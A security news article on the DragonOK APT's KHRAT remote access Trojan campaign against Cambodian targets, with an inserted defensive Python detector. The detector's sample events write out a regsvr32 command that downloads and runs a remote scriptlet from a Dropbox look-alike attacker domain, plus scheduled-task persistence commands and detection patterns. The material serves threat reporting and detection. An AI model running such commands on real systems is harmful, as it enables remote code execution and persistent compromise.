
DragonOK APT is adopting new tactics, techniques and procedures

Researchers at Palo Alto Networks recently observed the DragonOK APT group adopting new tactics, techniques and procedures.

China-linked cyber espionage group DragonOK is back: security experts from Palo Alto Networks have uncovered a new campaign leveraging the KHRAT remote access Trojan (RAT).

The DragonOK group (also known as NetTraveler (TravNet), PlugX, Saker, Netbot, DarkStRat, and ZeroT) was first spotted in September 2014 by security researchers at FireEye.

At the time, FireEye discovered two hacking campaigns conducted by distinct groups operating in separate regions of China that seemed to work in parallel.

The first team of hackers, named Moafee, targeted military and government organizations that were in some way involved in the South China Sea dispute. The attackers hit different organizations, as explained by the researchers at FireEye, and appear to operate from the Guangdong Province. The group also hit entities working in the defense industry in the United States.

A second team, dubbed DragonOK, conducted corporate espionage operations on high-tech and manufacturing companies in Japan and Taiwan.

Earlier this year, DragonOK targeted Japanese organizations in several industries, including manufacturing, technology, energy, higher education, and semiconductors.

The recent campaign featuring the KHRAT RAT targets victims located in Cambodia.

“Unit 42 recently observed activity involving the Remote Access Trojan KHRAT used by threat actors to target the citizens of Cambodia.” reads the blog post published by Palo Alto Networks.

“So called because the Command and Control (C2) infrastructure from previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forcepoint here, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors with typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.”

The KHRAT RAT provides attackers with the typical set of RAT features, including remote access to the victim system, keylogging, and remote shell access.

Researchers from Palo Alto Networks noticed that the threat actor has updated the spear phishing techniques and themes used in its campaign.

The hackers are using multiple methods to download and execute additional payloads through built-in Windows applications, and they have also started mimicking Dropbox.

Below are the key findings provided by Palo Alto Networks:

  • Updated spear phishing techniques and themes;
  • Multiple techniques to download and execute additional payloads using built-in Windows applications;
  • Expanded infrastructure mimicking the name of the well-known cloud-based file hosting service, Dropbox;
  • Compromised Cambodian government servers.

The experts observed an increase in the usage of this specific RAT over the past couple of months; the attacks against Cambodian entities were discovered in June.

Researchers observed the DragonOK group using weaponized documents whose titles reference “MIWRMP” (Mekong Integrated Water Resources Management Project), a multi-million dollar project concerning water resources and fisheries management in north-eastern Cambodia.

“The weaponized document, with the filename “Mission Announcement Letter for MIWRMP phase 3 implementation support mission, June 26-30, 2017(update).doc”, was shown in AutoFocus as contacting a Russian IP address 194.87.94[.]61 over port 80 in the form of a HTTP GET request to update.upload-dropbox[.]com – a site that could (erroneously) be thought of as belonging to the well-known cloud-based file hosting service, Dropbox, and as such is intended to trick victims and network defenders into thinking, at least at first glance, the C2 traffic is legitimate.” states the analysis.

The document tricks victims into enabling macros that run malicious operations, including creating new scheduled tasks and calling functions to run JavaScript code.

Palo Alto experts observed the hackers using the domain name update.upload-dropbox[.]com, which was hosted on a compromised Cambodian government website.

The sample hosted on the compromised government servers would launch the legitimate regsvr32.exe program to bypass built-in Windows protections.

“Index.ico would create three scheduled tasks with the more subtly named “Windows Scheduled Maintenance1” (Maintenance2 and Maintenance3), although three services with incremented numbers in their names is also a little suspicious, and use regsvr32.exe to download and execute three other .ico files – reg.ico, reg_salt.ico and reg_bak.ico – the purposes of which are currently unknown.” continues the analysis. “It’s worth noting each service has different running frequencies – every 4 minutes, 20 minutes and 10 minutes, respectively, which could indicate a dependency on reg.ico, as it is more aggressively sought after, or that is a more critical component to have running.”
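As an added defender-side example (not code from the Palo Alto report or from Security Affairs), the following Python snippet flags the three behaviours described above over constructed sample telemetry: regsvr32.exe fetching a remote scriptlet, scheduled tasks named "Windows Scheduled Maintenance<n>", and lookups of Dropbox look-alike hosts. The regsvr32 command-line shape and the event format are assumptions; the report does not give them.

```python
import re

# Constructed sample telemetry (process-creation and DNS events) in the spirit of the
# KHRAT report; these are not real events taken from it. The regsvr32 command line
# below is an assumed shape of "regsvr32 fetches a remote file", not the actual one.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://update.upload-dropbox.com/reg.ico scrobj.dll"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 4 /tn "Windows Scheduled Maintenance1" /tr "regsvr32.exe ..."'},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 20 /tn "Windows Scheduled Maintenance2" /tr "regsvr32.exe ..."'},
    # Benign: a vendor installer registering a local DLL with regsvr32.
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},
    {"type": "dns", "host": "update.upload-dropbox.com"},   # look-alike from the report
    {"type": "dns", "host": "www.dropbox.com"},             # genuine Dropbox
    {"type": "dns", "host": "dl.dropboxusercontent.com"},   # genuine Dropbox content host
]

# Domains Dropbox actually uses (assumed allow-list for the demo; extend for your estate).
LEGIT_DROPBOX = ("dropbox.com", "dropboxusercontent.com", "dropboxapi.com")
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(https?|ftp)://", re.I)     # regsvr32 pulling from a URL
MAINT_TASK = re.compile(r"Windows Scheduled Maintenance\d+", re.I)  # task-name pattern from the report

def is_legit_dropbox(host):
    """True only for the real Dropbox zones (exact match or a subdomain of them)."""
    h = host.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in LEGIT_DROPBOX)

def classify(event):
    """Return the list of alert tags for one event (empty list means nothing suspicious)."""
    tags = []
    if event["type"] == "process":
        cmd, image = event["cmdline"], event["image"].lower()
        if image.endswith("regsvr32.exe") and REMOTE_SCRIPTLET.search(cmd):
            tags.append("regsvr32-remote-scriptlet")
        if image.endswith("schtasks.exe") and "/create" in cmd.lower() and MAINT_TASK.search(cmd):
            tags.append("suspicious-maintenance-task")
    elif event["type"] == "dns":
        host = event["host"]
        if "dropbox" in host.lower() and not is_legit_dropbox(host):
            tags.append("dropbox-lookalike-domain")
    return tags

def scan(events):
    """Run classify() over a sequence of events and return (index, tag) pairs for every hit."""
    return [(i, tag) for i, ev in enumerate(events) for tag in classify(ev)]

if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {tag}")
```

The look-alike check is deliberately narrow (any host containing "dropbox" outside the real zones); in production, pair it with the incremented-task-name pattern across a host's task list rather than alerting on a single event.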

The researchers also noticed that the threat actor used JavaScript code that allows it to monitor who is visiting its site. The code would gather data such as user-agent, domain, cookie, referrer and Flash version, and appears almost identical to that found on a blog hosted on the Chinese Software Developer Network (CSDN) website.

The malware researchers conclude that the DragonOK APT has updated both its malware and its tactics, techniques and procedures (TTPs) in recent months, probably because it was planning to intensify its activity.

“The threat actors behind KHRAT have evolved the malware and their TTPs over the course of this year, in an attempt to produce more successful attacks, which in this case included targets within Cambodia.” concluded Palo Alto.

“This most recent campaign highlights social engineering techniques being used with reference and great detail given to nationwide activities, likely to be forefront of peoples’ minds; as well as the new use of multiple techniques in Windows to download and execute malicious payloads using built-in applications to remain inconspicuous which is a change since earlier variants,”


Pierluigi Paganini

(Security Affairs – DragonOK APT, hacking)
